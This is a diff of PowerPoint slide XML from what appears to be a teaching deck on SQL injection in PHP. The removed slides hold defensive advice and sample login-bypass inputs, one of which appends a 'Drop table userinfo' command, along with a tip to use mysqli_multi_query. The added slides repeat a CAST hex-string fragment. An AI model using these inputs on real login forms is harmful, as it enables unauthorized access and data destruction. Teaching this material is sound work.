+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>mysqli_query</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>PDO (PHP Data Objects)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>framework</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -3412,7 +3414,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4001900165"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4001004888"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -3466,98 +3468,84 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
+            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>mysql_query</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>mysqli_query</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>PDO (PHP Data Objects)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>framework</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
+              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>CAST(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>[long hex string] </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>AS</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>VARCHAR(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>8000</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>));</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -3588,7 +3576,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4001004888"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1492901293"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -3639,13 +3627,28 @@
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
-          </a:bodyPr>
+          <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                 <a:solidFill>
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
@@ -3654,10 +3657,14 @@
                 <a:ea typeface="+mn-ea"/>
                 <a:cs typeface="+mn-cs"/>
               </a:rPr>
-              <a:t>1. </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
+              <a:t>CAST(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>[long hex string] </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                 <a:solidFill>
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
@@ -3666,10 +3673,14 @@
                 <a:ea typeface="+mn-ea"/>
                 <a:cs typeface="+mn-cs"/>
               </a:rPr>
-              <a:t>Comprehensive data sanitization</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+              <a:t>AS</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                 <a:solidFill>
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
@@ -3678,10 +3689,14 @@
                 <a:ea typeface="+mn-ea"/>
                 <a:cs typeface="+mn-cs"/>
               </a:rPr>
-              <a:t>. Web sites must filter </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="1" kern="1200" dirty="0" smtClean="0">
+              <a:t>VARCHAR(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>8000</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                 <a:solidFill>
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
@@ -3690,230 +3705,9 @@
                 <a:ea typeface="+mn-ea"/>
                 <a:cs typeface="+mn-cs"/>
               </a:rPr>
-              <a:t>all</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t> user input. Ideally, user data should be filtered for context. For example, e-mail addresses should be filtered to allow only the characters allowed in an e-mail address, phone numbers should be filtered to allow only the characters allowed in a phone number, and so on.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>2. </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>Use a web application firewall</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>. A popular example is the free, open source module </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>ModSecurity</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t> which is available for Apache, Microsoft IIS, and </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>nginx</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t> web servers. ModSecurity provides a sophisticated and ever-evolving set of rules to filter potentially dangerous web requests. Its SQL injection defenses can catch most attempts to sneak SQL through web channels.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>3. </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>Limit database privileges by context</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>. Create multiple database user accounts with the minimum levels of privilege for their usage environment. For example, the code behind a login page should query the database using an account limited only to the </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>relevent</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t> credentials table. This way, a breach through this channel cannot be leveraged to compromise the entire database.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>4. </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>Avoid constructing SQL queries with user input</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="1" i="1" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>. </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>Even data sanitization routines can be flawed. Ideally, using SQL variable binding with prepared statements or stored procedures is much safer than constructing full queries.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-              <a:effectLst/>
-              <a:latin typeface="+mn-lt"/>
-              <a:ea typeface="+mn-ea"/>
-              <a:cs typeface="+mn-cs"/>
-            </a:endParaRPr>
+              <a:t>));</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -3944,7 +3738,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2167241784"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4264406020"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -3998,7 +3792,7 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
               <a:lnSpc>
                 <a:spcPct val="100000"/>
               </a:lnSpc>
@@ -4016,7 +3810,7 @@
               <a:defRPr/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                 <a:solidFill>
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
@@ -4025,60 +3819,14 @@
                 <a:ea typeface="+mn-ea"/>
                 <a:cs typeface="+mn-cs"/>
               </a:rPr>
-              <a:t>Login normal: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>quangsonpro, langtutuoiteen</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClrTx/>
-              <a:buSzTx/>
-              <a:buFontTx/>
-              <a:buNone/>
-              <a:tabLst/>
-              <a:defRPr/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" i="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Login hacked: admin’ or 1=1</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="0" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t> --</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" i="0" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+              <a:t>CAST(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>[long hex string] </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                 <a:solidFill>
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
@@ -4087,12 +3835,14 @@
                 <a:ea typeface="+mn-ea"/>
                 <a:cs typeface="+mn-cs"/>
               </a:rPr>
-              <a:t>Login hacked: admin' or 1=1 LIMIT 1 – </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+              <a:t>AS</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                 <a:solidFill>
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
@@ -4101,10 +3851,14 @@
                 <a:ea typeface="+mn-ea"/>
                 <a:cs typeface="+mn-cs"/>
               </a:rPr>
-              <a:t>Login</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
+              <a:t>VARCHAR(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>8000</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                 <a:solidFill>
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
@@ -4113,89 +3867,9 @@
                 <a:ea typeface="+mn-ea"/>
                 <a:cs typeface="+mn-cs"/>
               </a:rPr>
-              <a:t> hacked: admin’ or 1=1; Drop table </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>userinfo</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t> --  &lt;change a line of code if ($result = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>mysqli_multi_query</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>($conn, $</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>sql</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>)) {</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-              <a:effectLst/>
-              <a:latin typeface="+mn-lt"/>
-              <a:ea typeface="+mn-ea"/>
-              <a:cs typeface="+mn-cs"/>
-            </a:endParaRPr>
+              <a:t>));</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -4226,7 +3900,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1263682537"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2019265111"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -4385,7 +4059,7 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
               <a:lnSpc>
                 <a:spcPct val="100000"/>
               </a:lnSpc>
@@ -4403,7 +4077,7 @@
               <a:defRPr/>
             </a:pPr>
             <a:r>
